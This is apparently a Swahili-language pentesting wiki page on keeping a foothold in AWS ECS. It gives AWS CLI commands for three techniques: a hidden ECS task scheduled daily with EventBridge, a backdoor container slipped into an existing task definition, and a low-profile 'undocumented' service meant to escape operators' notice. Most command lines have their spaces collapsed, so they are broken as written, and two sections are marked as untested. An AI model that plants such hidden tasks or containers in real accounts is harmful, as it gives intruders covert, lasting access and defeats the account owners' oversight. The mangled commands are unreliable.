Mshambuliaji anaweza kuunda kazi ya kipindi cha siri ya ECS kwa kutumia Amazon EventBridge kwa lengo la kupanga utekelezaji wa kazi mbaya kwa kipindi cha mara kwa mara. Kazi hii inaweza kufanya upelelezi, kuchota data, au kudumisha uthabiti kwenye akaunti ya AWS.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
Weka mlango wa nyuma kwenye Sifa ya Kazi ya ECS Iliyopo
TODO: Jaribio
Mshambuliaji anaweza kuongeza kontena ya mlango wa nyuma isiyoonekana kwenye ufafanuzi wa kazi ya ECS uliopo ambayo inaendeshwa pamoja na kontena halali. Kontena ya mlango wa nyuma inaweza kutumika kwa ajili ya uthabiti na kutekeleza shughuli za uovu.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
Huduma ya ECS Isiyoelezwa
TODO: Jaribio
Mshambuliaji anaweza kuunda huduma ya ECS isiyoelezwa ambayo inaendesha kazi mbaya. Kwa kuweka idadi inayotakikana ya kazi kuwa chini kabisa na kuzima uchakataji wa kumbukumbu, inakuwa ngumu kwa waendeshaji kugundua huduma ya kibaya.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"